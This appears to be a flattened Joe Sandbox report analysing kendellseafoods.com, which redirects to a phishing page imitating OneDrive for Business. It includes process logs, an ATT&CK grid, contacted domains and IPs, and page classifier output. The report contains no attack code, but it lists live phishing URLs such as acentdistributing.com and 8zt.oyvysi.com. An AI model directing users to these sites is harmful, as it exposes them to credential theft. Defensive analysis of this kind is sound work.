Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6884_954186673
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6884_954186673\ssl_error_assistant.pb
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6884_954186673\manifest.json
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6884_954186673\_metadata\
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6884_954186673\_metadata\verified_contents.json
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6884_954186673\manifest.fingerprint
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\chrome_BITS_6884_94196446
Source: classification engineClassification label: mal52.phis.win@34/171@144/650
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=1964,i,16778189248454906919,2977420556437404773,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://kendellseafoods.com/"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=1964,i,16778189248454906919,2977420556437404773,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: Window RecorderWindow detected: More than 3 window changes detected

Persistence and Installation Behavior

barindex
Source: https://www.acentdistributing.com/LLM: Page contains button: 'REVIEW DOCUMENT HERE' Source: '0.0.pages.csv'
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6884_590986451\Google.Widevine.CDM.dllJump to dropped file
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6884_590986451\Google.Widevine.CDM.dllJump to dropped file
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Browser Extensions
1
Process Injection
21
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder
1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
File Deletion
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
SourceDetectionScannerLabelLink
C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6884_590986451\Google.Widevine.CDM.dll0%ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
static.cloudflareinsights.com
104.16.80.73
truefalse
    unknown
    kendellseafoods.com
    198.185.159.145
    truefalse
      unknown
      squarespace.map.fastly.net
      151.101.128.238
      truefalse
        unknown
        ams.creativecdn.com
        185.184.8.90
        truefalse
          unknown
          stats.g.doubleclick.net
          142.250.110.154
          truefalse
            unknown
            scontent.xx.fbcdn.net
            157.240.253.1
            truefalse
              unknown
              code.jquery.com
              151.101.2.137
              truefalse
                unknown
                asia.creativecdn.com
                103.132.192.30
                truefalse
                  unknown
                  cdnjs.cloudflare.com
                  104.17.25.14
                  truefalse
                    unknown
                    www.google.com
                    142.250.186.68
                    truefalse
                      unknown
                      made-in-china.com
                      213.61.193.204
                      truefalse
                        unknown
                        prod.squarespace.map.fastly.net
                        151.101.0.238
                        truefalse
                          unknown
                          star-mini.c10r.facebook.com
                          157.240.253.35
                          truefalse
                            unknown
                            performance.squarespace.com
                            35.186.236.0
                            truefalse
                              unknown
                              a.nel.cloudflare.com
                              35.190.80.1
                              truefalse
                                unknown
                                8zt.oyvysi.com
                                104.21.51.219
                                truefalse
                                  unknown
                                  static.squarespace.map.fastly.net
                                  151.101.192.237
                                  truefalse
                                    unknown
                                    ax-0001.ax-msedge.net
                                    150.171.27.10
                                    truefalse
                                      unknown
                                      1589314308.rsc.cdn77.org
                                      195.181.170.19
                                      truefalse
                                        unknown
                                        googleads.g.doubleclick.net
                                        142.250.185.194
                                        truefalse
                                          unknown
                                          challenges.cloudflare.com
                                          104.18.95.41
                                          truefalse
                                            unknown
                                            giwmkckv2mhdmprzl27w7sl809sj3oulafvkxoj4fpz5w94cnsyngv.tubeawelm.ru
                                            172.67.197.235
                                            truefalse
                                              unknown
                                              widget.usersnap.com
                                              18.158.29.188
                                              truefalse
                                                unknown
                                                td.doubleclick.net
                                                142.250.186.130
                                                truefalse
                                                  unknown
                                                  analytics.google.com
                                                  142.250.185.206
                                                  truefalse
                                                    unknown
                                                    ext-sq.squarespace.com
                                                    198.185.159.144
                                                    truefalse
                                                      unknown
                                                      ib.anycast.adnxs.com
                                                      37.252.171.85
                                                      truefalse
                                                        unknown
                                                        resources.usersnap.com
                                                        18.66.122.90
                                                        truefalse
                                                          unknown
                                                          www.acentdistributing.com
                                                          unknown
                                                          unknownfalse
                                                            unknown
                                                            www.made-in-china.com
                                                            unknown
                                                            unknownfalse
                                                              unknown
                                                              assets.squarespace.com
                                                              unknown
                                                              unknownfalse
                                                                unknown
                                                                image.made-in-china.com
                                                                unknown
                                                                unknownfalse
                                                                  unknown
                                                                  static1.squarespace.com
                                                                  unknown
                                                                  unknownfalse
                                                                    unknown
                                                                    login.made-in-china.com
                                                                    unknown
                                                                    unknownfalse
                                                                      unknown
                                                                      webim.trademessenger.com
                                                                      unknown
                                                                      unknownfalse
                                                                        unknown
                                                                        fa.micstatic.com
                                                                        unknown
                                                                        unknownfalse
                                                                          unknown
                                                                          f.creativecdn.com
                                                                          unknown
                                                                          unknownfalse
                                                                            unknown
                                                                            pic.made-in-china.com
                                                                            unknown
                                                                            unknownfalse
                                                                              unknown
                                                                              use.typekit.net
                                                                              unknown
                                                                              unknownfalse
                                                                                unknown
                                                                                webim.made-in-china.com
                                                                                unknown
                                                                                unknownfalse
                                                                                  unknown
                                                                                  www.facebook.com
                                                                                  unknown
                                                                                  unknownfalse
                                                                                    unknown
                                                                                    images.squarespace-cdn.com
                                                                                    unknown
                                                                                    unknownfalse
                                                                                      unknown
                                                                                      discovery.micstatic.com
                                                                                      unknown
                                                                                      unknownfalse
                                                                                        unknown
                                                                                        connect.facebook.net
                                                                                        unknown
                                                                                        unknownfalse
                                                                                          unknown
                                                                                          membercenter.made-in-china.com
                                                                                          unknown
                                                                                          unknownfalse
                                                                                            unknown
                                                                                            tags.creativecdn.com
                                                                                            unknown
                                                                                            unknownfalse
                                                                                              unknown
                                                                                              p.typekit.net
                                                                                              unknown
                                                                                              unknownfalse
                                                                                                unknown
                                                                                                ib.adnxs.com
                                                                                                unknown
                                                                                                unknownfalse
                                                                                                  unknown
                                                                                                  www.micstatic.com
                                                                                                  unknown
                                                                                                  unknownfalse
                                                                                                    unknown
                                                                                                    NameMaliciousAntivirus DetectionReputation
                                                                                                    https://www.acentdistributing.com/true
                                                                                                      unknown
                                                                                                      https://www.made-in-china.com/false
                                                                                                        unknown
                                                                                                        https://8zt.oyvysi.com/h2b7AtfcCPBLraDgEbdA/true
                                                                                                          unknown
                                                                                                          • No. of IPs < 25%
                                                                                                          • 25% < No. of IPs < 50%
                                                                                                          • 50% < No. of IPs < 75%
                                                                                                          • 75% < No. of IPs
                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                          142.250.186.68
                                                                                                          www.google.comUnited States
                                                                                                          15169GOOGLEUSfalse
                                                                                                          173.194.76.84
                                                                                                          unknownUnited States
                                                                                                          15169GOOGLEUSfalse
                                                                                                          2.19.126.206
                                                                                                          unknownEuropean Union
                                                                                                          16625AKAMAI-ASUSfalse
                                                                                                          104.18.33.75
                                                                                                          unknownUnited States
                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                          104.16.80.73
                                                                                                          static.cloudflareinsights.comUnited States
                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                          151.101.128.238
                                                                                                          squarespace.map.fastly.netUnited States
                                                                                                          54113FASTLYUSfalse
                                                                                                          198.185.159.145
                                                                                                          kendellseafoods.comUnited States
                                                                                                          53831SQUARESPACEUSfalse
                                                                                                          104.21.34.46
                                                                                                          unknownUnited States
                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                          198.185.159.144
                                                                                                          ext-sq.squarespace.comUnited States
                                                                                                          53831SQUARESPACEUSfalse
                                                                                                          172.67.197.235
                                                                                                          giwmkckv2mhdmprzl27w7sl809sj3oulafvkxoj4fpz5w94cnsyngv.tubeawelm.ruUnited States
                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                          104.18.33.67
                                                                                                          unknownUnited States
                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                          104.18.33.66
                                                                                                          unknownUnited States
                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                          142.250.185.142
                                                                                                          unknownUnited States
                                                                                                          15169GOOGLEUSfalse
                                                                                                          172.64.154.139
                                                                                                          unknownUnited States
                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                          35.190.80.1
                                                                                                          a.nel.cloudflare.comUnited States
                                                                                                          15169GOOGLEUSfalse
                                                                                                          2.16.202.120
                                                                                                          unknownEuropean Union
                                                                                                          16625AKAMAI-ASUSfalse
                                                                                                          142.250.184.195
                                                                                                          unknownUnited States
                                                                                                          15169GOOGLEUSfalse
                                                                                                          34.104.35.123
                                                                                                          unknownUnited States
                                                                                                          15169GOOGLEUSfalse
                                                                                                          1.1.1.1
                                                                                                          unknownAustralia
                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                          18.66.122.90
                                                                                                          resources.usersnap.comUnited States
                                                                                                          3MIT-GATEWAYSUSfalse
                                                                                                          104.18.95.41
                                                                                                          challenges.cloudflare.comUnited States
                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                          142.250.110.154
                                                                                                          stats.g.doubleclick.netUnited States
                                                                                                          15169GOOGLEUSfalse
                                                                                                          185.184.8.90
                                                                                                          ams.creativecdn.comPoland
                                                                                                          204995RTB-HOUSE-AMSNLfalse
                                                                                                          239.255.255.250
                                                                                                          unknownReserved
                                                                                                          unknownunknownfalse
                                                                                                          142.250.185.194
                                                                                                          googleads.g.doubleclick.netUnited States
                                                                                                          15169GOOGLEUSfalse
                                                                                                          103.132.192.30
                                                                                                          asia.creativecdn.comSingapore
                                                                                                          138552RTBHOUSE-AS-APRTBHOUSEPTELTDSGfalse
                                                                                                          157.240.253.35
                                                                                                          star-mini.c10r.facebook.comUnited States
                                                                                                          32934FACEBOOKUSfalse
                                                                                                          172.217.16.195
                                                                                                          unknownUnited States
                                                                                                          15169GOOGLEUSfalse
                                                                                                          37.252.171.85
                                                                                                          ib.anycast.adnxs.comEuropean Union
                                                                                                          29990ASN-APPNEXUSfalse
                                                                                                          104.17.25.14
                                                                                                          cdnjs.cloudflare.comUnited States
                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                          216.58.212.168
                                                                                                          unknownUnited States
                                                                                                          15169GOOGLEUSfalse
                                                                                                          142.250.185.78
                                                                                                          unknownUnited States
                                                                                                          15169GOOGLEUSfalse
                                                                                                          142.250.185.206
                                                                                                          analytics.google.comUnited States
                                                                                                          15169GOOGLEUSfalse
                                                                                                          151.101.64.238
                                                                                                          unknownUnited States
                                                                                                          54113FASTLYUSfalse
                                                                                                          104.21.51.219
                                                                                                          8zt.oyvysi.comUnited States
                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                          185.89.210.212
                                                                                                          unknownGermany
                                                                                                          29990ASN-APPNEXUSfalse
                                                                                                          216.58.206.72
                                                                                                          unknownUnited States
                                                                                                          15169GOOGLEUSfalse
                                                                                                          142.250.186.130
                                                                                                          td.doubleclick.netUnited States
                                                                                                          15169GOOGLEUSfalse
                                                                                                          172.217.18.14
                                                                                                          unknownUnited States
                                                                                                          15169GOOGLEUSfalse
                                                                                                          104.18.94.41
                                                                                                          unknownUnited States
                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                          104.18.43.160
                                                                                                          unknownUnited States
                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                          151.101.0.238
                                                                                                          prod.squarespace.map.fastly.netUnited States
                                                                                                          54113FASTLYUSfalse
                                                                                                          216.58.206.36
                                                                                                          unknownUnited States
                                                                                                          15169GOOGLEUSfalse
                                                                                                          213.61.193.204
                                                                                                          made-in-china.comGermany
                                                                                                          8220COLTCOLTTechnologyServicesGroupLimitedGBfalse
                                                                                                          104.18.33.117
                                                                                                          unknownUnited States
                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                          142.250.186.132
                                                                                                          unknownUnited States
                                                                                                          15169GOOGLEUSfalse
                                                                                                          142.250.184.202
                                                                                                          unknownUnited States
                                                                                                          15169GOOGLEUSfalse
                                                                                                          104.17.24.14
                                                                                                          unknownUnited States
                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                          151.101.192.237
                                                                                                          static.squarespace.map.fastly.netUnited States
                                                                                                          54113FASTLYUSfalse
                                                                                                          18.158.29.188
                                                                                                          widget.usersnap.comUnited States
                                                                                                          16509AMAZON-02USfalse
                                                                                                          195.181.170.19
                                                                                                          1589314308.rsc.cdn77.orgUnited Kingdom
                                                                                                          60068CDN77GBfalse
                                                                                                          172.64.154.190
                                                                                                          unknownUnited States
                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                          151.101.2.137
                                                                                                          code.jquery.comUnited States
                                                                                                          54113FASTLYUSfalse
                                                                                                          150.171.27.10
                                                                                                          ax-0001.ax-msedge.netUnited States
                                                                                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                          18.66.122.119
                                                                                                          unknownUnited States
                                                                                                          3MIT-GATEWAYSUSfalse
                                                                                                          2.19.126.211
                                                                                                          unknownEuropean Union
                                                                                                          16625AKAMAI-ASUSfalse
                                                                                                          172.64.144.96
                                                                                                          unknownUnited States
                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                          157.240.253.1
                                                                                                          scontent.xx.fbcdn.netUnited States
                                                                                                          32934FACEBOOKUSfalse
                                                                                                          88.221.110.34
                                                                                                          unknownEuropean Union
                                                                                                          20940AKAMAI-ASN1EUfalse
                                                                                                          207.211.211.26
                                                                                                          unknownUnited States
                                                                                                          14135NAVISITE-EAST-2USfalse
                                                                                                          157.240.251.35
                                                                                                          unknownUnited States
                                                                                                          32934FACEBOOKUSfalse
                                                                                                          35.186.236.0
                                                                                                          performance.squarespace.comUnited States
                                                                                                          15169GOOGLEUSfalse
                                                                                                          104.102.44.86
                                                                                                          unknownUnited States
                                                                                                          16625AKAMAI-ASUSfalse
                                                                                                          142.250.185.98
                                                                                                          unknownUnited States
                                                                                                          15169GOOGLEUSfalse
                                                                                                          IP
                                                                                                          192.168.2.17
                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                          Analysis ID:1528309
                                                                                                          Start date and time:2024-10-07 19:08:21 +02:00
                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                          Overall analysis duration:
                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                          Report type:full
                                                                                                          Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                                          Sample URL:http://kendellseafoods.com/
                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                          Number of analysed new started processes analysed:20
                                                                                                          Number of new started drivers analysed:0
                                                                                                          Number of existing processes analysed:0
                                                                                                          Number of existing drivers analysed:0
                                                                                                          Number of injected processes analysed:0
                                                                                                          Technologies:
                                                                                                          • EGA enabled
                                                                                                          Analysis Mode:stream
                                                                                                          Analysis stop reason:Timeout
                                                                                                          Detection:MAL
                                                                                                          Classification:mal52.phis.win@34/171@144/650
                                                                                                          • Exclude process from analysis (whitelisted): TextInputHost.exe
                                                                                                          • Excluded IPs from analysis (whitelisted): 172.217.16.195, 142.250.185.142, 173.194.76.84, 34.104.35.123, 2.19.126.206, 2.19.126.198, 104.102.44.86
                                                                                                          • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, use-stls.adobe.com.edgesuite.net, clientservices.googleapis.com, clients.l.google.com, static3.squarespace.com-1.edgekey.net, e16901.dscb.akamaiedge.net, a1988.dscg1.akamai.net
                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                          • VT rate limit hit for: http://kendellseafoods.com/
                                                                                                          InputOutput
                                                                                                          URL: https://www.acentdistributing.com/ Model: jbxai
                                                                                                          {
                                                                                                          "brand":["OneDrive for Business"],
                                                                                                          "contains_trigger_text":true,
                                                                                                          "trigger_text":"REVIEW DOCUMENT HERE",
                                                                                                          "prominent_button_name":"REVIEW DOCUMENT HERE",
                                                                                                          "text_input_field_labels":"unknown",
                                                                                                          "pdf_icon_visible":false,
                                                                                                          "has_visible_captcha":false,
                                                                                                          "has_urgent_text":false,
                                                                                                          "text":"OneDrive for Business REVIEW DOCUMENT HERE",
                                                                                                          "has_visible_qrcode":false}
                                                                                                          URL: https://8zt.oyvysi.com/h2b7AtfcCPBLraDgEbdA/ Model: jbxai
                                                                                                          {
                                                                                                          "brand":["Cloudflare"],
                                                                                                          "contains_trigger_text":true,
                                                                                                          "trigger_text":"Browser checks in progress to secure your connection.",
                                                                                                          "prominent_button_name":"unknown",
                                                                                                          "text_input_field_labels":"unknown",
                                                                                                          "pdf_icon_visible":false,
                                                                                                          "has_visible_captcha":false,
                                                                                                          "has_urgent_text":false,
                                                                                                          "text":"Verifying...",
                                                                                                          "has_visible_qrcode":false}
                                                                                                          URL: https://8zt.oyvysi.com/h2b7AtfcCPBLraDgEbdA/ Model: jbxai
                                                                                                          {
                                                                                                          "brand":["Cloudflare"],
                                                                                                          "contains_trigger_text":false,
                                                                                                          "trigger_text":"",
                                                                                                          "prominent_button_name":"unknown",
                                                                                                          "text_input_field_labels":"unknown",
                                                                                                          "pdf_icon_visible":false,
                                                                                                          "has_visible_captcha":false,
                                                                                                          "has_urgent_text":false,
                                                                                                          "text":"Success!",
                                                                                                          "has_visible_qrcode":false}
                                                                                                          URL: https://www.made-in-china.com/ Model: jbxai
                                                                                                          {
                                                                                                          "brand":["Made-in-China"],
                                                                                                          "contains_trigger_text":false,
                                                                                                          "trigger_text":"",
                                                                                                          "prominent_button_name":"Post My RFQ",
                                                                                                          "text_input_field_labels":["SMART EXPO",
                                                                                                          "Secured Trading Service",
                                                                                                          "Star Suppliers",
                                                                                                          "Selected Supplier"],
                                                                                                          "pdf_icon_visible":false,
                                                                                                          "has_visible_captcha":false,
                                                                                                          "has_urgent_text":false,
                                                                                                          "text":"Made-in-China Connecting Buyers with Chinese Suppliers",
                                                                                                          "has_visible_qrcode":false}
                                                                                                          URL: https://www.made-in-china.com/ Model: jbxai
                                                                                                          {
                                                                                                          "brand":["Made-in-China"],
                                                                                                          "contains_trigger_text":false,
                                                                                                          "trigger_text":"",
                                                                                                          "prominent_button_name":"Post My RFQ",
                                                                                                          "text_input_field_labels":["SMART EXPO",
                                                                                                          "Secured Trading Service",
                                                                                                          "Star Suppliers",
                                                                                                          "Selected Supplier"],
                                                                                                          "pdf_icon_visible":false,
                                                                                                          "has_visible_captcha":false,
                                                                                                          "has_urgent_text":false,
                                                                                                          "text":"Med & Chem Connect Merging Chemicals and Medicine for Tomorrow",
                                                                                                          "has_visible_qrcode":false}
                                                                                                          URL: https://www.made-in-china.com/ Model: jbxai
                                                                                                          {
                                                                                                          "brand":["Made-in-China"],
                                                                                                          "contains_trigger_text":false,
                                                                                                          "trigger_text":"",
                                                                                                          "prominent_button_name":"Post My RFQ",
                                                                                                          "text_input_field_labels":["Power & Energy",
                                                                                                          "HYDRAULICS - PNEUMATICS",
                                                                                                          "Top-selling Products in Industry Equipment &..."],
                                                                                                          "pdf_icon_visible":false,
                                                                                                          "has_visible_captcha":false,
                                                                                                          "has_urgent_text":false,
                                                                                                          "text":"Made-in-China Connecting Buyers with Chinese Suppliers",
                                                                                                          "has_visible_qrcode":false}
                                                                                                          URL: https://www.made-in-china.com/ Model: jbxai
                                                                                                          {
                                                                                                          "brand":["Made-in-China"],
                                                                                                          "contains_trigger_text":false,
                                                                                                          "trigger_text":"",
                                                                                                          "prominent_button_name":"Post My RFQ",
                                                                                                          "text_input_field_labels":["SMART EXPO",
                                                                                                          "Secured Trading Service",
                                                                                                          "Selected Supplier"],
                                                                                                          "pdf_icon_visible":false,
                                                                                                          "has_visible_captcha":false,
                                                                                                          "has_urgent_text":false,
                                                                                                          "text":"Made-in-China Connecting Buyers with Chinese Suppliers",
                                                                                                          "has_visible_qrcode":false}
                                                                                                          URL: https://www.made-in-china.com/ Model: jbxai
                                                                                                          {
                                                                                                          "brand":["Made-in-China"],
                                                                                                          "contains_trigger_text":false,
                                                                                                          "trigger_text":"",
                                                                                                          "prominent_button_name":"Post My RFQ",
                                                                                                          "text_input_field_labels":["SMART EXPO",
                                                                                                          "Secured Trading Service",
                                                                                                          "Star Suppliers",
                                                                                                          "Selected Supplier"],
                                                                                                          "pdf_icon_visible":false,
                                                                                                          "has_visible_captcha":false,
                                                                                                          "has_urgent_text":false,
                                                                                                          "text":"Made-in-China Connecting Buyers with Chinese Suppliers",
                                                                                                          "has_visible_qrcode":false}
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Oct 7 16:08:55 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2677
                                                                                                          Entropy (8bit):3.9953733498439394
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:6B2C742FEA5A16096409C6366DE1F52A
                                                                                                          SHA1:B231CEF4CF3C9CD2E016A7506DF9CEFC26A82890
                                                                                                          SHA-256:B0AE3318BD36AF4928FC4E67A46406285FBD31A98286AE13DD4CD609CDB7C950
                                                                                                          SHA-512:7280DD90D367B860AB2E4F6B3C13254EE4104B621BD3E7F92E5EE8B22E583063A36654AC067120003638100A696BF2820DDB4C13E9EC2985C1DB7C3A13F90DCB
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:L..................F.@.. ...$+.,....z...........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.IGY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VGY......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.VGY......M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.VGY.............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VGY.............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............I......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Oct 7 16:08:55 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2679
                                                                                                          Entropy (8bit):4.008102300584703
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:4963C913409CCC3D0F45761237874734
                                                                                                          SHA1:BB470B4EA9AB8A164DE1E1AEA8D1D08AF24F13D7
                                                                                                          SHA-256:CC1BD44CB25A4AF45842736A125F407296387AF3F23D6EAED8591BA79FC576A5
